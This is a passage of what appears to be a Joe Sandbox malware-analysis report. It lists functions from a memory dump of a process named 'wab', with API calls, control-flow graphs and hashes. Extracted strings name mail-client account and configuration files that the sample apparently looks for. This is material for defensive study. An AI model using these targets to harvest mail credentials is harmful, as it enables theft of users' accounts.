                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                • String ID:
                                                                                                                • API String ID: 161543041-0
                                                                                                                • Opcode ID: 245d93a52396b2feac493b80fd618ce2458303cebfb4772f73f2f090e52bcd4b
                                                                                                                • Instruction ID: 35190b7a88c611e72275187ef6578d2868ab5476e93c5dea6f809092caf95794
                                                                                                                • Opcode Fuzzy Hash: 245d93a52396b2feac493b80fd618ce2458303cebfb4772f73f2f090e52bcd4b
                                                                                                                • Instruction Fuzzy Hash: FC316DB2611345DFEB219B38DA44BB6B7E9FF80354F104869E849DB191DF32AA94CB10
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 22C959D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • _free.LIBCMT ref: 22C959EA
                                                                                                                  • Part of subcall function 22C9571E: HeapFree.KERNEL32(00000000,00000000,?,22C9924F,?,00000000,?,00000000,?,22C99276,?,00000007,?,?,22C97E5A,?), ref: 22C95734
                                                                                                                  • Part of subcall function 22C9571E: GetLastError.KERNEL32(?,?,22C9924F,?,00000000,?,00000000,?,22C99276,?,00000007,?,?,22C97E5A,?,?), ref: 22C95746
                                                                                                                • _free.LIBCMT ref: 22C959F6
                                                                                                                • _free.LIBCMT ref: 22C95A01
                                                                                                                • _free.LIBCMT ref: 22C95A0C
                                                                                                                • _free.LIBCMT ref: 22C95A17
                                                                                                                • _free.LIBCMT ref: 22C95A22
                                                                                                                • _free.LIBCMT ref: 22C95A2D
                                                                                                                • _free.LIBCMT ref: 22C95A38
                                                                                                                • _free.LIBCMT ref: 22C95A43
                                                                                                                • _free.LIBCMT ref: 22C95A51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 776569668-0
                                                                                                                • Opcode ID: 340b08e32e708cdd677e15571e695117dc8862c5ac83d78b16d5d50c6fb5d402
                                                                                                                • Instruction ID: 3d647b77690fd939169bebbe795ba3edbd39d5a1cdf87ec48a276e03d0d4f9fa
                                                                                                                • Opcode Fuzzy Hash: 340b08e32e708cdd677e15571e695117dc8862c5ac83d78b16d5d50c6fb5d402
                                                                                                                • Instruction Fuzzy Hash: 3411427A520348EFCB21DF94D941DED3FA9EF14390B5541A5BA088F225DA32EB509B80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 22C9AA53 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 374 22c9aa53-22c9aa6e 375 22c9aa80 374->375 376 22c9aa70-22c9aa7e RtlDecodePointer 374->376 377 22c9aa85-22c9aa8b 375->377 376->377 378 22c9aa91 377->378 379 22c9abb2-22c9abb5 377->379 380 22c9aa97-22c9aa9a 378->380 381 22c9aba6 378->381 382 22c9ac12 379->382 383 22c9abb7-22c9abba 379->383 385 22c9aaa0 380->385 386 22c9ab47-22c9ab4a 380->386 384 22c9aba8-22c9abad 381->384 387 22c9ac19 382->387 388 22c9abbc-22c9abbf 383->388 389 22c9ac06 383->389 390 22c9ac5b-22c9ac6a call 22c92ada 384->390 391 22c9ab34-22c9ab42 385->391 392 22c9aaa6-22c9aaab 385->392 396 22c9ab9d-22c9aba4 386->396 397 22c9ab4c-22c9ab4f 386->397 393 22c9ac20-22c9ac49 387->393 394 22c9abfa 388->394 395 22c9abc1-22c9abc4 388->395 389->382 391->393 399 22c9aaad-22c9aab0 392->399 400 22c9ab25-22c9ab2f 392->400 421 22c9ac4b-22c9ac50 call 22c96368 393->421 422 22c9ac56-22c9ac59 393->422 394->389 401 22c9abee 395->401 402 22c9abc6-22c9abc9 395->402 398 22c9ab61-22c9ab8f 396->398 403 22c9ab51-22c9ab54 397->403 404 22c9ab94-22c9ab9b 397->404 398->422 406 22c9ab1c-22c9ab23 399->406 407 22c9aab2-22c9aab5 399->407 400->393 401->394 409 22c9abcb-22c9abd0 402->409 410 22c9abe2 402->410 403->390 411 22c9ab5a 403->411 404->387 413 22c9aac7-22c9aaf7 406->413 414 22c9ab0d-22c9ab17 407->414 415 22c9aab7-22c9aaba 407->415 416 22c9abdb-22c9abe0 409->416 417 22c9abd2-22c9abd5 409->417 410->401 411->398 413->422 428 22c9aafd-22c9ab08 call 22c96368 413->428 414->393 415->390 419 22c9aac0 415->419 416->384 417->390 417->416 419->413 421->422 422->390 428->422
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DecodePointer
                                                                                                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                • API String ID: 3527080286-3064271455
                                                                                                                • Opcode ID: 266efc7f2735567b61a414aa9099ba4377762841174e830123230d5de7940f76
                                                                                                                • Instruction ID: 874f76b31cc9e63914070b8a7f0c2cdbc769c8929c27b0e40fd8d6dd4f304b88
                                                                                                                • Opcode Fuzzy Hash: 266efc7f2735567b61a414aa9099ba4377762841174e830123230d5de7940f76
                                                                                                                • Instruction Fuzzy Hash: 8651517190470ACBCF00DFA5EA885FC7FB5FF49314F104685E581AB264CB7A8A24CB18
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 22C91CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 22C91D1B
                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 22C91D37
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22C91D4B
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22C91D58
                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22C91D72
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22C91D7D
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22C91D8A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                • String ID:
                                                                                                                • API String ID: 1454806937-0
                                                                                                                • Opcode ID: 60e71535fdf481acb733f1caddc5e01549af2c7d4bc8189ef261ca7c69efb19f
                                                                                                                • Instruction ID: 12c16975d3947802e944e985d6fdf12afa483eab5103f7266f7354fbf825ec00
                                                                                                                • Opcode Fuzzy Hash: 60e71535fdf481acb733f1caddc5e01549af2c7d4bc8189ef261ca7c69efb19f
                                                                                                                • Instruction Fuzzy Hash: 832135B194131CBFD711ABA48D8DEFB77ACEB58354F000A65FA11E2144D6B49E458BB0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 22C99492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 448 22c99492-22c994ef GetConsoleCP 449 22c99632-22c99644 call 22c92ada 448->449 450 22c994f5-22c99511 448->450 451 22c9952c-22c9953d call 22c97c19 450->451 452 22c99513-22c9952a 450->452 459 22c9953f-22c99542 451->459 460 22c99563-22c99565 451->460 454 22c99566-22c99575 call 22c979e6 452->454 454->449 464 22c9957b-22c9959b WideCharToMultiByte 454->464 462 22c99609-22c99628 459->462 463 22c99548-22c9955a call 22c979e6 459->463 460->454 462->449 463->449 471 22c99560-22c99561 463->471 464->449 466 22c995a1-22c995b7 WriteFile 464->466 467 22c995b9-22c995ca 466->467 468 22c9962a-22c99630 GetLastError 466->468 467->449 470 22c995cc-22c995d0 467->470 468->449 472 22c995fe-22c99601 470->472 473 22c995d2-22c995f0 WriteFile 470->473 471->464 472->450 475 22c99607 472->475 473->468 474 22c995f2-22c995f6 473->474 474->449 476 22c995f8-22c995fb 474->476 475->449 476->472
                                                                                                                APIs
                                                                                                                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,22C99C07,?,00000000,?,00000000,00000000), ref: 22C994D4
                                                                                                                • __fassign.LIBCMT ref: 22C9954F
                                                                                                                • __fassign.LIBCMT ref: 22C9956A
                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000005,00000000,00000000), ref: 22C99590
                                                                                                                • WriteFile.KERNEL32(?,?,00000000,22C99C07,00000000,?,?,?,?,?,?,?,?,?,22C99C07,?), ref: 22C995AF
                                                                                                                • WriteFile.KERNEL32(?,?,?,22C99C07,00000000,?,?,?,?,?,?,?,?,?,22C99C07,?), ref: 22C995E8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                • String ID:
                                                                                                                • API String ID: 1324828854-0
                                                                                                                • Opcode ID: 405262ef2a85d0a9729164755d7412fc8516014026b03005dd62526d2fe81b56
                                                                                                                • Instruction ID: a65c59bd6d17e20fc13249a16bbe185c29c4ba2239f1e62d8ca965e99497c39f
                                                                                                                • Opcode Fuzzy Hash: 405262ef2a85d0a9729164755d7412fc8516014026b03005dd62526d2fe81b56
                                                                                                                • Instruction Fuzzy Hash: 3E51D3B1D00349AFDB14CFA8C895AFEBBF9EF49310F14465AE951E7281D730AA41CB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 22C93370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 477 22c93370-22c933b5 call 22c93330 call 22c937a7 482 22c933b7-22c933c9 477->482 483 22c93416-22c93419 477->483 484 22c93439-22c93442 482->484 486 22c933cb 482->486 483->484 485 22c9341b-22c93428 call 22c93790 483->485 489 22c9342d-22c93436 call 22c93330 485->489 488 22c933d0-22c933e7 486->488 490 22c933e9-22c933f7 call 22c93740 488->490 491 22c933fd 488->491 489->484 499 22c933f9 490->499 500 22c9340d-22c93414 490->500 492 22c93400-22c93405 491->492 492->488 495 22c93407-22c93409 492->495 495->484 498 22c9340b 495->498 498->489 501 22c933fb 499->501 502 22c93443-22c9344c 499->502 500->489 501->492 503 22c9344e-22c93455 502->503 504 22c93486-22c93496 call 22c93774 502->504 503->504 506 22c93457-22c93466 call 22c9bbe0 503->506 510 22c93498-22c934a7 call 22c93790 504->510 511 22c934aa-22c934c6 call 22c93330 call 22c93758 504->511 512 22c93468-22c93480 506->512 513 22c93483 506->513 510->511 512->513 513->504
                                                                                                                APIs
                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 22C9339B
                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 22C933A3
                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 22C93431
                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 22C9345C
                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 22C934B1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                • String ID: csm
                                                                                                                • API String ID: 1170836740-1018135373
                                                                                                                • Opcode ID: dd2af1f83d56ab55fead3aa865ea3003438f2536e1f001de85fc730084c4cbe8
                                                                                                                • Instruction ID: bd5f20d04e22b218bc8ba3605891b8ad58eb2d7b40f4dd8bc4346362da8ef3b6
                                                                                                                • Opcode Fuzzy Hash: dd2af1f83d56ab55fead3aa865ea3003438f2536e1f001de85fc730084c4cbe8
                                                                                                                • Instruction Fuzzy Hash: DF41B634E00348ABCF01DF68C984AAEBFB5BF86328F118155E915AF391D735EA15CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 22C9925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 22C99221: _free.LIBCMT ref: 22C9924A
                                                                                                                • _free.LIBCMT ref: 22C992AB
                                                                                                                  • Part of subcall function 22C9571E: HeapFree.KERNEL32(00000000,00000000,?,22C9924F,?,00000000,?,00000000,?,22C99276,?,00000007,?,?,22C97E5A,?), ref: 22C95734
                                                                                                                  • Part of subcall function 22C9571E: GetLastError.KERNEL32(?,?,22C9924F,?,00000000,?,00000000,?,22C99276,?,00000007,?,?,22C97E5A,?,?), ref: 22C95746
                                                                                                                • _free.LIBCMT ref: 22C992B6
                                                                                                                • _free.LIBCMT ref: 22C992C1
                                                                                                                • _free.LIBCMT ref: 22C99315
                                                                                                                • _free.LIBCMT ref: 22C99320
                                                                                                                • _free.LIBCMT ref: 22C9932B
                                                                                                                • _free.LIBCMT ref: 22C99336
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 776569668-0
                                                                                                                • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                • Instruction ID: 42d6a43063d2bf134326a21a0808d49726565acf2f75657585597c4ca0016fbe
                                                                                                                • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                • Instruction Fuzzy Hash: B9119031550F48FADB38ABF0DC45FEF7B9DAF24700F400824A699B6092DA35B6448752
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 22C98821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,22C96FFD,00000000,?,?,?,22C98A72,?,?,00000100), ref: 22C9887B
                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?,?,?,?,22C98A72,?,?,00000100,5EFC4D8B,?,?), ref: 22C98901
                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 22C989FB
                                                                                                                • __freea.LIBCMT ref: 22C98A08
                                                                                                                  • Part of subcall function 22C956D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 22C95702
                                                                                                                • __freea.LIBCMT ref: 22C98A11
                                                                                                                • __freea.LIBCMT ref: 22C98A36
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1414292761-0
                                                                                                                • Opcode ID: c49044fd0b9547335a76aecbac5ee6f70228dc34b2e6b137513421d0912dfff1
                                                                                                                • Instruction ID: 2cd8d2b3c7236099c13787eec63bb3e61943969f033cf6e166ce18949977470a
                                                                                                                • Opcode Fuzzy Hash: c49044fd0b9547335a76aecbac5ee6f70228dc34b2e6b137513421d0912dfff1
                                                                                                                • Instruction Fuzzy Hash: 3751CC72614306AAEB158F60CD85EBB37AAEF81764F514728FD04EB180EB35EC50C6A0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 22C915DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _strlen.LIBCMT ref: 22C91607
                                                                                                                • _strcat.LIBCMT ref: 22C9161D
                                                                                                                • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,22C9190E,?,?,00000000,?,00000000), ref: 22C91643
                                                                                                                • lstrcatW.KERNEL32(?,?), ref: 22C9165A
                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,22C9190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 22C91661
                                                                                                                • lstrcatW.KERNEL32(00001008,?), ref: 22C91686
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1922816806-0
                                                                                                                • Opcode ID: 9ff6ed906e0562598ff1e0975f64fbb66eea5d248902263ba8685969266a5c31
                                                                                                                • Instruction ID: 32c14194c50aaed30dcd27c168d2306a1ea62cddf014cb2ff2b127df65ef4407
                                                                                                                • Opcode Fuzzy Hash: 9ff6ed906e0562598ff1e0975f64fbb66eea5d248902263ba8685969266a5c31
                                                                                                                • Instruction Fuzzy Hash: 8D21D736900304ABDB14DF64DC85EFE77B8EF88710F24441AE904EB285DB74A641D7A5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 22C91000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • lstrcatW.KERNEL32(?,?), ref: 22C91038
                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 22C9104B
                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 22C91061
                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 22C91075
                                                                                                                • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 22C91090
                                                                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 22C910B8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                • String ID:
                                                                                                                • API String ID: 3594823470-0
                                                                                                                • Opcode ID: 119ec2fbb9d8f14a547f9ee784732731d2d7ed4c95a786034eea304cc5825f3c
                                                                                                                • Instruction ID: c9eb495a57e54248ed21bf155e35a4636712b995c5df8516995e03559ad13758
                                                                                                                • Opcode Fuzzy Hash: 119ec2fbb9d8f14a547f9ee784732731d2d7ed4c95a786034eea304cc5825f3c
                                                                                                                • Instruction Fuzzy Hash: 28218E35900318ABCF20DB60DD4DEEF376CEF84324F104696E959A72B1DAB19A85CF80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 22C93856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(?,?,22C93518,22C923F1,22C91F17), ref: 22C93864
                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 22C93872
                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 22C9388B
                                                                                                                • SetLastError.KERNEL32(00000000,?,22C93518,22C923F1,22C91F17), ref: 22C938DD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                • String ID:
                                                                                                                • API String ID: 3852720340-0
                                                                                                                • Opcode ID: 61edd382966506b7a397d849d688a34e8bb8a7341b1c3d04ef4b968856c1e9dd
                                                                                                                • Instruction ID: 67f48fa733cc327bf54b65ee3f6235d6d0520ef6ad57ecae3c7dbe449c20aae9
                                                                                                                • Opcode Fuzzy Hash: 61edd382966506b7a397d849d688a34e8bb8a7341b1c3d04ef4b968856c1e9dd
                                                                                                                • Instruction Fuzzy Hash: BA01D832A497116DA2012BB96D89A3A6B95DF55774B20032BEA209F0D5EF154801838C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 22C95AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(?,?,22C96C6C), ref: 22C95AFA
                                                                                                                • _free.LIBCMT ref: 22C95B2D
                                                                                                                • _free.LIBCMT ref: 22C95B55
                                                                                                                • SetLastError.KERNEL32(00000000,?,?,22C96C6C), ref: 22C95B62
                                                                                                                • SetLastError.KERNEL32(00000000,?,?,22C96C6C), ref: 22C95B6E
                                                                                                                • _abort.LIBCMT ref: 22C95B74
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$_free$_abort
                                                                                                                • String ID:
                                                                                                                • API String ID: 3160817290-0
                                                                                                                • Opcode ID: aed449e83962a5453e6928dcacc430732bb529a7c8998935684115997bedc446
                                                                                                                • Instruction ID: f777a71e032857da221b1ce5b3757a0b7f8c508bddff3cbd439e783082519d1e
                                                                                                                • Opcode Fuzzy Hash: aed449e83962a5453e6928dcacc430732bb529a7c8998935684115997bedc446
                                                                                                                • Instruction Fuzzy Hash: F8F0F6B6585700ABD30227346D4DF3E2B6A9FE1BF1F250624FD14A71C5FE398A0382A4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 22C911EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 22C91E89: lstrlenW.KERNEL32(?,?,?,?,?,22C910DF,?,?,?,00000000), ref: 22C91E9A
                                                                                                                  • Part of subcall function 22C91E89: lstrcatW.KERNEL32(?,?), ref: 22C91EAC
                                                                                                                  • Part of subcall function 22C91E89: lstrlenW.KERNEL32(?,?,22C910DF,?,?,?,00000000), ref: 22C91EB3
                                                                                                                  • Part of subcall function 22C91E89: lstrlenW.KERNEL32(?,?,22C910DF,?,?,?,00000000), ref: 22C91EC8
                                                                                                                  • Part of subcall function 22C91E89: lstrcatW.KERNEL32(?,22C910DF), ref: 22C91ED3
                                                                                                                • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 22C9122A
                                                                                                                  • Part of subcall function 22C9173A: _strlen.LIBCMT ref: 22C91855
                                                                                                                  • Part of subcall function 22C9173A: _strlen.LIBCMT ref: 22C91869
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                • API String ID: 4036392271-1520055953
                                                                                                                • Opcode ID: 22c7ae009b3d5bfca53dbdf63b116ed1f642509acb9adb6f4a5e02b671f6a9c9
                                                                                                                • Instruction ID: 67d89948236555e39a4f481abe40a1abeb97726b23786cc3360298188ff82b18
                                                                                                                • Opcode Fuzzy Hash: 22c7ae009b3d5bfca53dbdf63b116ed1f642509acb9adb6f4a5e02b671f6a9c9
                                                                                                                • Instruction Fuzzy Hash: 6921D2B9E103486AEB109BA4EC92FFE7339EF80714F001556F604EB2E4E6F11E808759
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 22C94B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,22C94AEA,?,?,22C94A8A,?,22CA2238,0000000C,22C94BBD,00000000,00000000), ref: 22C94B59
